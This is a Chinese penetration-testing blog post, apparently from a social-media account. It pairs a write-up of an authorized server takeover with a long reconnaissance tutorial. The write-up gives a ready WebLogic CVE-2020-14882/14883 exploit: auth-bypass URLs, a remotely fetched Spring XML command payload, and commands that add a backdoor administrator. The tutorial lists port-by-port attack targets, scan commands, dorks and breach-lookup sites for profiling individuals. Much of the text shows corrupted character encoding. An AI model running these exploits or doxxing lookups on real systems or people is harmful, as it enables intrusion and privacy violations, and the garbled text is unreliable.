《中華人民共和國刑法》
第二百八十五條規(guī)定,非法侵入計算機信息系統(tǒng)罪;非法獲取計算機信息系統(tǒng)數(shù)據(jù)、非法控制計算機信息系統(tǒng)罪;提供侵入、非法控制計算機信息系統(tǒng)程序、工具罪是指,違反國家規(guī)定,侵入國家事務、國防建設、尖端科學技術領域的計算機信息系統(tǒng)的,處三年以下有期徒刑或者拘役。
違反國家規(guī)定,侵入前款規(guī)定以外的計算機信息系統(tǒng)或者采用其他技術手段,獲取該計算機信息系統(tǒng)中存儲、處理或者傳輸?shù)臄?shù)據(jù),或者對該計算機信息系統(tǒng)實施非法控制,情節(jié)嚴重的,處三年以下有期徒刑或者拘役,并處或者單處罰金;情節(jié)特別嚴重的,處三年以上七年以下有期徒刑,并處罰金。
提供專門用于侵入、非法控制計算機信息系統(tǒng)的程序、工具,或者明知他人實施侵入、非法控制計算機信息系統(tǒng)的違法犯罪行為而為其提供程序、工具,情節(jié)嚴重的,依照前款的規(guī)定處罰。
背景說明
本次滲透已獲得授權,本文僅用于分享滲透思路,若將本文思路用于違法行為,后果自負!
本次滲透目的用于找回一臺服務器密碼,因為管理員密碼丟失,無法登錄和管理此服務器,而停機PE修改密碼必然會影響業(yè)務運行,因此本次采用滲透方式嘗試獲取管理員密碼。
信息收集
一開始我有想過MS17-010永恒之藍漏洞和向日葵CNVD-2022-10270/CNVD-2022-03672,可以一擊必殺,但現(xiàn)實肯定沒這么簡單,MS17-010的補丁已經打了,而向日葵這玩意會自動升級。
所以先用Goby全端口全漏洞掃描了一遍
能掃出來的高危漏洞就有5個,這不穩(wěn)了?
ActiveMQ default admin account
默認管理員密碼漏洞,漏洞存在,但是這個組件我不熟悉,沒法利用
CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE
BlueKeep這漏洞在我心里就是個藍屏漏洞,在這里無用武之地
tomcat lfi (CVE-2020-1938)
文件讀取、包含,我這里管理員都登陸不上去,所以也沒啥用
Weblogic Server RCE (CVE-2021-2109)
遠程代碼執(zhí)行漏洞,實現(xiàn)起來有點復雜,先放一下
Oracle WebLogic Unauthenticated Takeover (CVE-2020-14883)
CVE-2020-14882&CVE-2020-14883 Weblogic未授權遠程命令執(zhí)行漏洞,這兩個漏洞一般是同時修復,存在一個基本也就存在另一個,兩者結合,可以一試
構造POC
查看登錄頁
http://IP:7001/console/login/LoginForm.jsp
后臺越權訪問
http://IP:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29
編寫POC.XML,上傳到自己的web服務器
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>cmd</value>
<value>/c</value>
<value><![CDATA[echo hello > "../../../wlserver/server/lib/consoleapp/webapp/images/xxx.jsp"]]></value>
</list>
</constructor-arg>
</bean>
</beans>
執(zhí)行遠端XML
http://IP:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://我的web服務器/poc.xml")
驗證結果
http://IP:7001/console/images/xxx.jsp
穩(wěn)了!查看當前用戶,把POC里的echo hello改成whoami,驗證結果
system權限,我焯!
依次構造添加用戶并加入管理員組的POC
net user test test /add
net localgroup administrators test /add
直接遠程登陸
因為沒有管理員密碼,所以管理員從未登陸過,使用Mimikatz獲取管理員密碼的嘗試失敗了。
我這里選擇修改administrator密碼,至此,滲透完成!
修復建議
1、及時更新系統(tǒng)補丁,淘汰已過期的操作系統(tǒng),如windows2008R2
2、及時更新服務組件,如本文中OracleWebLogic、ActiveMQ、tomcat均存在漏洞
3、安裝EDR、部署IPS入侵防御系統(tǒng),增強系統(tǒng)安全性
公眾號:滲透師老A
專注分享滲透經驗,干貨技巧....
信息搜集也稱踩點,信息搜集毋庸置疑就是盡可能的搜集目標的信息,包括端口信息、DNS信息、員工郵箱等等看似并不起眼的一些信息都算是信息搜集,這些看似微乎其微的信息,對于滲透測試而言就關乎到成功與否了。
信息搜集是滲透測試的最重要的階段,占據(jù)整個滲透測試的60%,可見信息搜集的重要性。根據(jù)收集的有用信息,可以大大提高我們滲透測試的成功率。
1、主動式信息搜集(可獲取到的信息較多,但易被目標發(fā)現(xiàn))
2、通過直接發(fā)起與被測目標網絡之間的互動來獲取相關信息,如通過Nmap掃描目標系統(tǒng)。
3、被動式信息搜集(搜集到的信息較少,但不易被發(fā)現(xiàn))
4、通過第三方服務來獲取目標網絡相關信息。如通過搜索引擎方式來搜集信息。
網站由域名,服務器,WEB應用組成。
可以先從域名開始
信息收集腦圖:
Whois 簡單來說,就是一個用來查詢域名是否已經被注冊,以及注冊域名的詳細信息的數(shù)據(jù)庫(如域名所有人、域名注冊商、域名注冊日期和過期日期、DNS等)。通過域名Whois服務器查詢,可以查詢域名歸屬者聯(lián)系方式,以及注冊和到期時間
可以通過whois信息進行反查,郵箱,聯(lián)系人等信息來反查到更多的信息
查詢域名注冊郵箱
通過域名查詢備案號
通過備案號查詢域名
反查注冊郵箱
反查注冊人
通過注冊人查詢到的域名在查詢郵箱
通過上一步郵箱去查詢域名
查詢以上獲取出的域名的子域名
主動查詢:
kali 自帶whois查詢
命令:whois + ip/域名
利用Dnslytics反查IP可以得到如下信息:
IP information
Network information
Hosting information
SPAM database lookup
Open TCP/UDP ports
Blocklist lookup
Whois information
Geo information
Country information
Update information
利用Dnslytics反查域名可以得到如下信息:
Domain and Ranking Information
Hosting Information{
A / AAAA Record
NS Record
MX Record
SPF Record
}
Web Information
Whois Information
通過Google、FireFox等插件的使用,收集域名信息
myip.ms:
TCPIPUTILS:
DNSlytics:
子域名收集可以發(fā)現(xiàn)更多目標,以增加滲透測試成功的可能性,探測到更多隱藏或遺忘的應用服務,這些應用往往可導致一些嚴重漏洞。當一個主站堅不可摧時,我們可以嘗試從分站入手。
主動收集:
layer子域名挖掘機5.0:使用這款工具首先要安裝.net framework 4.0以上,否則會出現(xiàn):
備案信息分為兩種,一種是IPC備案信息查詢,一種是公安部備案信息查詢。如果是國外的服務器是不需要備案的,因此可以忽略此步驟,國內的服務器是需要備案的,因此可以嘗試獲取信息。
被動收集:
服務器信息收集
DNS信息收集
通過查詢DNS信息,我們可能可以發(fā)現(xiàn)網站的真實ip地址,也可以嘗試測試是否存在DNS域傳送漏洞。
查詢方式
主動收集
被動收集
查詢方式
主動收集
被動收集
瀏覽器插件
通過不同的協(xié)議(TCP半連接、TCP全連接、ICMP、UDP等)的掃描繞過Firewalld的限制
nmap -sP 192.33.6.128
nmap -sT 192.33.6.128
nmap -sS 192.33.6.128
nmap -sU 192.33.6.128
nmap -sF 192.33.6.128
nmap -sX 192.33.6.128
nmap -sN 192.33.6.128
Masscan+Nmap:
有些時候網站的入口點屬于非常規(guī)端口,因此是必須要做全端口掃描,做全端口掃描的時候由于namp發(fā)包量大經常出現(xiàn)各種問題,如端口掃描不全、獲得信息不準等等,為了解決上述問題,這里提供一個masscan+nmap結合的方式進行快速掃描。
原理:使用masscan做全端口開放檢測,檢測出來端口信息后,用nmap進行服務信息識別。
使用:終端輸入以下命令執(zhí)行即可
# masscan 192.33.6.145 -p1-65535 --rate 1000 -oL ports
# ports=$(cat ports | awk -F " " '{print $3}' | sort -n | tr '\n' ',' | sed 's/,$//' | sed 's/^,,//')
# nmap -sV -p $ports 192.33.6.145
端口:21 服務:FTP/TFTP/VSFTPD 總結:爆破/嗅探/溢出/后門
端口:22 服務:ssh遠程連接 總結:爆破/openssh漏洞
端口:23 服務:Telnet遠程連接 總結:爆破/嗅探/弱口令
端口:25 服務:SMTP郵件服務 總結:郵件偽造
端口:53 服務:DNS域名解析系統(tǒng) 總結:域傳送/劫持/緩存投毒/欺騙
端口:67/68 服務:dhcp服務 總結:劫持/欺騙
端口:110 服務:pop3 總結:爆破/嗅探
端口:139 服務:Samba服務 總結:爆破/未授權訪問/遠程命令執(zhí)行
端口:143 服務:Imap協(xié)議 總結:爆破161SNMP協(xié)議爆破/搜集目標內網信息
端口:389 服務:Ldap目錄訪問協(xié)議 總結:注入/未授權訪問/弱口令
端口:445 服務:smb 總結:ms17-010/端口溢出
端口:512/513/514 服務:Linux Rexec服務 總結:爆破/Rlogin登陸
端口:873 服務:Rsync服務 總結:文件上傳/未授權訪問
端口:1080 服務:socket 總結:爆破
端口:1352 服務:Lotus domino郵件服務 總結:爆破/信息泄漏
端口:1433 服務:mssql 總結:爆破/注入/SA弱口令
端口:1521 服務:oracle 總結:爆破/注入/TNS爆破/反彈shell2049Nfs服務配置不當
端口:2181 服務:zookeeper服務 總結:未授權訪問
端口:2375 服務:docker remote api 總結:未授權訪問
端口:3306 服務:mysql 總結:爆破/注入
端口:3389 服務:Rdp遠程桌面鏈接 總結:爆破/shift后門
端口:4848 服務:GlassFish控制臺 總結:爆破/認證繞過
端口:5000 服務:sybase/DB2數(shù)據(jù)庫 總結:爆破/注入/提權
端口:5432 服務:postgresql 總結:爆破/注入/緩沖區(qū)溢出
端口:5632 服務:pcanywhere服務 總結:抓密碼/代碼執(zhí)行
端口:5900 服務:vnc 總結:爆破/認證繞過
端口:6379 服務:Redis數(shù)據(jù)庫 總結:未授權訪問/爆破
端口:7001/7002 服務:weblogic 總結:java反序列化/控制臺弱口令
端口:80/443 服務:http/https 總結:web應用漏洞/心臟滴血
端口:8069 服務:zabbix服務 總結:遠程命令執(zhí)行/注入
端口:8161 服務:activemq 總結:弱口令/寫文件
端口:8080/8089 服務:Jboss/Tomcat/Resin 總結:爆破/PUT文件上傳/反序列化
端口:8083/8086 服務:influxDB 總結:未授權訪問
端口:9000 服務:fastcgi 總結:遠程命令執(zhí)行
端口:9090 服務:Websphere 總結:控制臺爆破/java反序列化/弱口令
端口:9200/9300 服務:elasticsearch 總結:遠程代碼執(zhí)行
端口:11211 服務:memcached 總結:未授權訪問
端口:27017/27018 服務:mongodb 總結:未授權訪問/爆破
21端口滲透解析:
介紹:Ftp一般是用于對遠程服務器進行管理,大多數(shù)都用于對Web系統(tǒng)進行管理。一般密碼泄露是直接威脅Web系統(tǒng)安全的,一旦讓黑客知道是可以通過提權直接控制服務器。
22端口滲透解析:
介紹:SSH是協(xié)議,是使用在協(xié)議應用上的,SSH是Secure Shell的縮寫。有IETF的網絡工作小組所制定;SSH是建立在應用層和傳輸層基礎上的安全協(xié)議。
23端口滲透解析:
介紹:Telnet是一種很老的遠程管理方式,使用telnet工具登陸系統(tǒng)的過程中,網絡上的傳輸用戶和密碼都是以明文的方式去傳送的,所以這是一種很不安全的管理方式,黑客可以使用嗅探技術進行劫取此類密碼等。
25/465端口滲透解析:
介紹:smtp:郵箱協(xié)議,在linux中是默認回開啟這個服務的,是一個相對簡單的基于文本的協(xié)議。smtps:這是smtp協(xié)議基于ssl安全協(xié)議之上的一種變種協(xié)議。它繼承了ssl安全協(xié)議的非對稱的加密。我對smtps協(xié)議也很頭疼所以給不出太多的建議。
53端口滲透解析:
介紹:53端口一般是DNS域名服務器的通信端口,用于域名的解析。也是比較關鍵的服務器之一,但是這類服務器很 容易就受到攻擊。
80端口滲透解析:
介紹:80端口是提供Web服務的端口,對于各位我想的是進入一個新的Web站點可能最會先想到SQL注入的方法,當然腳本滲透液是一項極強的Web滲透技術,同時也能對80端口造成威脅。
135端口滲透解析:
介紹:135端口主要是用于RPC協(xié)議是提供DCOM服務,PRC可以保證一臺計算機上運行的程序可以順利的執(zhí)行遠程計算機上的代碼;使用DCOM可以通過網絡進行通信。同時這個端口也爆出了不少的漏洞,最嚴重的還是我們熟悉的緩沖區(qū)溢出的漏洞
139/445端口滲透解析:
介紹:139端口是提供windows文件和打印機共享以及Unix中的Samba服務,家庭很少會開啟這個服務,但是學校就不一樣了,我可沒有暗示你們什么。445端口其實也是為windows提供文件很打印機的共享,這兩個端口在內網中是使用次數(shù)最多的,但是這兩個端口的漏洞都比較多,而且出現(xiàn)過很多高危漏洞。
1433端口滲透解析:
介紹:1433是SQLServer默認的端口,SQL Server服務使用兩個端口:tcp-1433、UDP-1434.其中1433用于供SQLServer對外提供服務,1434用于向請求者返回SQLServer使用了哪些TCP/IP端口。1433端口通常遭到黑客的攻擊,最嚴重的還是遠程溢出漏洞了,如由于SQL注射攻擊的方式,數(shù)據(jù)庫面臨著很多威脅,這種攻擊方式是屬于腳本滲透技術的。
1521端口滲透解析:
介紹:1521一般是大型數(shù)據(jù)庫Oracle的默認端口,對于一些沒有安全工作經驗的人來說,還是比較陌生的,以為大多數(shù)接觸到的數(shù)據(jù)庫都是Access、msssql、mysql。一般大型的站點才會使用Oracle數(shù)據(jù)庫系統(tǒng),以為這個數(shù)據(jù)庫系統(tǒng)比較復雜。
2049端口滲透解析:
介紹:FS(Network File System)即網絡文件系統(tǒng),是FreeBSD支持的文件系統(tǒng)中的一種,它允許網絡中的計算機之間通過TCP/IP網絡共享資源。在NFS的應用中,本地NFS的客戶端應用可以透明地讀寫位于遠端NFS服務器上的文件,就像訪問本地文件一樣。如今NFS具備了防止被利用導出文件夾的功能,但遺留系統(tǒng)中的NFS服務配置不當,則仍可能遭到惡意攻擊者的利用。
3306端口滲透解析:
介紹:3306是MYSQL數(shù)據(jù)庫默認的監(jiān)聽端口,通常部署在中型web系統(tǒng)中。在國內LAMP的配置是非常流行的,對于php+mysql構架的攻擊也是屬于比較熱門的話題。mysql數(shù)據(jù)庫允許用戶使用自定義函數(shù)功能,這使得黑客可編寫惡意的自定義函數(shù)對服務器進行滲透,最后取得服務器最高權限。
3389端口滲透解析:
介紹:3389是windows遠程桌面服務默認監(jiān)聽的端口,管理員通過遠程桌面對服務器進行維護,這給管理工作帶來的極大的方便。通常此端口也是黑客們較為感興趣的端口之一,利用它可對遠程服務器進行控制,而且不需要另外安裝額外的軟件,實現(xiàn)方法比較簡單。當然這也是系統(tǒng)合法的服務,通常是不會被殺毒軟件所查殺的。使用‘輸入法漏洞’進行滲透。
4899端口滲透解析:
介紹:4899端口是remoteadministrator遠程控制軟件默認監(jiān)聽的端口,也就是平時常說的radmini影子。radmini目前支持TCP/IP協(xié)議,應用十分廣泛,在很多服務器上都會看到該款軟件的影子。
5432端口滲透解析:
介紹:PostgreSQL是一種特性非常齊全的自由軟件的對象–關系型數(shù)據(jù)庫管理系統(tǒng),可以說是目前世界上最先進,功能最強大的自由數(shù)據(jù)庫管理系統(tǒng)。包括kali系統(tǒng)中msf也使用這個數(shù)據(jù)庫;淺談postgresql數(shù)據(jù)庫攻擊技術 大部分關于它的攻擊依舊是sql注入。
5631端口滲透解析:
介紹:5631端口是著名遠程控制軟件pcanywhere的默認監(jiān)聽端口,同時也是世界領先的遠程控制軟件。此軟件設計有缺陷,可以隨意的下載保存連接密碼的.cif文件。可以用專門的破解軟件破解。
5900端口滲透解析:
介紹:5900端口是遠程控制軟件VNC的默認端口,VNC是基于UNIX和LINUX操作系統(tǒng)免費開放的源碼
6379端口滲透解析:
介紹:Redis是一個開源的使用c語言寫的,支持網絡、可基于內存亦可持久化的日志型、key-value數(shù)據(jù)庫。關于這個數(shù)據(jù)庫這兩年還是很火的,暴露出來的問題也很多。特別是暴露的未授權訪問。
7001/7002端口滲透解析:
介紹:好像沒什么介紹,就是weblogic中間插件的端口。
8080端口滲透解析:
介紹:8080端口通常是apache_Tomcat服務器默認監(jiān)聽端口,apache是世界使用排名第一的web服務器。國內就有很多人喜歡有這種服務器。
27017端口滲透解析:
介紹:沒什么可以說的,和其他數(shù)據(jù)庫攻擊方法差不多。
CND繞過思路
域名解析記錄
世界各地DNS服務器地址大全:http://www.ab173.com/dns/dns_world.php
操作系統(tǒng)
查詢方式
被動:
主動
中間件,Web容器:
數(shù)據(jù)庫,編程語言:
敏感目錄及敏感信息、源碼泄露
御劍:
御劍這款工具主要用于掃描網站的敏感目錄、敏感文件。這里必須要說明一下字典必須要足夠強大才可以掃到別人發(fā)現(xiàn)不了的點。因此我們必須完善一下自己的字典。
敏感目錄:robots.txt、crossdomin.xml、sitemap.xml、源碼泄漏文件、/WEB-INF/
搜索引擎:
搜索引擎也可以用于搜索網站的敏感目錄、敏感文件和敏感信息。
這里就必須提一下搜索引擎的語法了,這里以google 黑客語法為例,語法同樣適用于百度搜索引擎。
基本語法:
"" 雙引號表示強制搜索
- 表示搜索不包含關鍵詞的網頁
| 或者的意思
site 指定域名
intext 搜索到的網頁正文部分包含關鍵詞
intitle 搜索到的網頁標題包含關鍵詞
cache 搜索關于某些內容的緩存
definne 搜索某個詞語的定義
filetype 搜索指定的文件類型
info 查找指定站點的一些基本信息
inurl 搜索包含關鍵詞的URL
link 可以返回所有和baidu.com做了鏈接的URL
BBscan:
BBscan是一款信息泄漏批量掃描腳本。它是依舊還是由lijiejie大佬用python寫的安全工具。
在windows平臺運行需要解決依賴問題:
pip install -r requirements.txt
使用命令:
GSIL:
GSIL是一款由python3寫的從github上尋找敏感文件的安全工具。
先安裝一下環(huán)境
pip install -r requirements.txt
用法:
# 啟動測試
$ python3 gsil.py test
# 測試token有效性
$ python3 gsil.py --verify-tokens
C端是和目標服務器ip處在同一個C段的其它服務器
北極熊掃描器
Nmap
北極熊掃描器掃C端:http://www.xitongzhijia.net/soft/71774.html
指紋是什么:
指定路徑下指定名稱的js文件或代碼。
指定路徑下指定名稱的css文件或代碼。
<title>中的內容,有些程序標題中會帶有程序標識
meta標記中帶程序標識<meta name=”description”/><meta name=”keywords”/><meta name=”generator”/><meta name=”author”/><meta name=”copyright”/>中帶程序標識。
display:none中的版權信息。
頁面底部版權信息,關鍵字? Powered by等。
readme.txt、License.txt、help.txt等文件。
指定路徑下指定圖片文件,如一些小的圖標文件,后臺登錄頁面中的圖標文件等,一般管理員不會修改它們。
注釋掉的html代碼中<!–
http頭的X-Powered-By中的值,有的應用程序框架會在此值輸出。
cookie中的關鍵字
robots.txt文件中的關鍵字
404頁面
302返回時的旗標
通過識別目標網站所使用的CMS信息,可以幫助我們進一步了解滲透測試環(huán)境,可以利用已知的一些CMS漏洞來進行攻擊。
主動收集
被動收集
WAF判斷
WAF也稱Web應用防護系統(tǒng),Web應用防火墻是通過執(zhí)行一系列針對HTTP/HTTPS的安全策略來專門為Web應用提供保護的一款產品。
原理:WAF識別大多基于Headers頭信息。通過發(fā)送惡意的內容,對比響應,尋找數(shù)據(jù)包被攔截、拒絕或者檢測到的標識。
第三方判斷:
手工判斷
Nmap判斷:兩種腳本
一種是:
http-waf-detect
一種是:
http-waf-fingerprint
wafw00f:https://github.com/EnableSecurity/wafw00f
天眼查地址:https://www.tianyancha.com/
企業(yè)信用信息公示系統(tǒng):http://www.gsxt.gov.cn/index.html
悉知-全國企業(yè)信息查詢:https://company.xizhi.com/
信用中國:https://www.creditchina.gov.cn/
源碼泄露
常見源碼泄露:
/.bzr/
/CVS/Entries
/CVS/Root
/.DS_Store MacOS自動生成
/.hg/
/.svn/ (/.svn/entries)
/.git/
/WEB-INF/src/
/WEB-INF/lib/
/WEB-INF/classes/
/WEB-INF/database.properties
/WEB-INF/web.xml
Robots.txt
網站備份文件泄露常見名稱:
backup
db
data
web
wwwroot
database
www
code
test
admin
user
sql
.bak
.html
_index.html
.swp
.rar
.txt
.zip
.7z
.sql
.tar.gz
.tgz
.tar.bak
.html
_index.html
.swp
.rar
.txt
.zip
.7z
.sql
.tar.gz
.tgz
.tar
常見的掃描工具就和目錄掃描的工具差不多
工具:JSFinder
SFinder是一款用作快速在網站的js文件中提取URL,子域名的工具。
安裝:
pip3 install requests bs4
git clone https://github.com/Threezh1/JSFinder.git
使用:
python3 JSFinder.py -u http://www.mi.com
python3 JSFinder.py -u http://www.mi.com -d
工具:LinkFinder
該工具通過網站中的JS文件來發(fā)現(xiàn)服務端、敏感信息、隱藏控制面板的URL鏈接等有用信息,可最大化地提高URL發(fā)現(xiàn)效率
安裝:
git clone https://github.com/GerbenJavado/LinkFinder.git
cd LinkFinder
python2 setup.py install
使用:
在線JavaScript文件中查找端點的最基本用法,并將結果輸出到results.html:
python linkfinder.py -i https://example.com/1.js -o results.html
CLI輸出(不使用jsbeautifier,這使得它非常快):
pyhon linkfinder.py -i https://example.com/1.js -o cli
分析整個域及其JS文件:
python linkfinder.py -i https://example.com -d
Burp輸入(在目標中選擇要保存的文件,右鍵單擊,Save selected items將該文件作為輸入):
python linkfinder.py -i burpfile -b
枚舉JavaScript文件的整個文件夾,同時查找以/ api /開頭的終結點,并最終將結果保存到results.html:
python linkfinder.py -i 'Desktop/*.js' -r ^/api/ -o results.html
常用工具:
snitch:
Snitch可以針對指定域自動執(zhí)行信息收集過程。此工具可幫助收集可通過Web搜索引擎找到的指定信息。在滲透測試的早期階段,它可能非常有用。
安裝:
git clone https://github.com/Smaash/snitch.git
使用:
python2.7 snitch.py -C "site:whitehouse.gov filetype:pdf" -P 100
Google Hacking
site:域名 filetype:.doc | .docx | .xls | .xlsx | .ppt | .pptx | .odt | .pdf | .rtf | .sxw | .psw | .csv
郵箱信息收集
Infoga:
Infoga可從不同的公共源網絡(搜索引擎,pgp密鑰服務器和shodan)收集電子郵件帳戶信息(ip,主機名,國家/地區(qū)…)。是一個用法非常簡單的工具,但是,對于滲透測試的早期階段,或者只是為了了解自己公司在互聯(lián)網上的可見性是非常有效的。
安裝:
git clone https://github.com/m4ll0k/Infoga.git /data/infoga
cd /data/infoga
pip3 install requests
python3 infoga.py
使用:
python3 infoga.py --domain site.com --source all -v 3 | grep Email | cut -d ' ' -f 3 | uniq | sed -n '/-/!p'
python3 infoga.py --info emailtest@site.com
python3 infoga.py --info emailtest@site.com -b
Online Search Email:
通過全球最大的幾個數(shù)據(jù)泄露站點在線查詢郵箱信息泄露情況
https://monitor.firefox.com/
https://haveibeenpwned.com/
https://ghostproject.fr/
社工庫:
https://dehashed.com/
https://aleph.occrp.org/
https://www.blackbookonline.info/
通過用戶的一些信息(Mail、Name、ID、Tel)查詢用戶注冊過哪些應用
https://www.reg007.com/
https://checkusernames.com/
https://knowem.com/
https://namechk.com/
https://chaipip.com/ip.php
https://www.opengps.cn/Data/IP/LocHighAcc.aspx
https://www.ipip.net/ip.html
https://www.ip2location.com/demo/
https://www.maxmind.com/en/geoip2-precision-demo
https://www.ip138.com/
地址:https://github.com/trustedsec/social-engineer-toolkit
工具的使用教程我并沒有發(fā)全,建議大家可以自己去多研究研究